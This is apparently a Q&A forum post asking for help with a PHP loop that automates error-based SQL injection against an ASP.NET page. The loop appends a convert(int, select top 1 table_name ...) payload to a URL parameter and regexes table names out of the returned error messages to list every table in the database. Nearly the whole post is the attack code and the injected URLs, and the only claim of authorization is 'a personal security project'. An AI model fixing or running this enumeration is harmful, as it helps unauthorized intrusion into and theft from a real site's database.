Scanning words with preg_match and adding to CURL query

Scanning words with preg_match and adding to CURL query

I'm trying to get all the tables of a particular database in the following
way:
//get_data($url) is a curl function that returns the data.
$remove="''";
do {
$returned_content = get_data($url);
$query ="+and+1=convert(int,
(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(".$remove.")))--";
$url="http://abc.com/a.aspx?param=1'".$query;
preg_match('~\'(.*?)\'~', $returned_content, $it);
if ($remove) {
$remove = $it[0];
}
else {
$remove.= ','.$it[0];
}
}
while ((stripos($returned_content,'cannot be found') == false) &&
(stripos($returned_content,'no row') == false));
The intended purpose of the above code is to build $remove as
'table1','table2','table3' which can be used in the URL to detect other
tables in the database.
However, after the first query, which is this URL:
http://abc.com/a.aspx?param=1'+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('')))--
(note the single quotes ('') in the not in clause)
The second query is a malformed URL, where the single quotes ('') disappear:
http://abc.com/a.aspx?param=1'+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+()))--
This leads to an error, and now the preg_match function returns ')', as
the error statement says Incorrect syntax near ')'. This bracket is then
appended to $remove, and then the whole query goes wrong.
How can I fix this code so that $remove is built correctly and lists all
the tables in the DB?
P.S. I know this looks a lot like SQL Injection, but it is a personal
security project I am pursuing.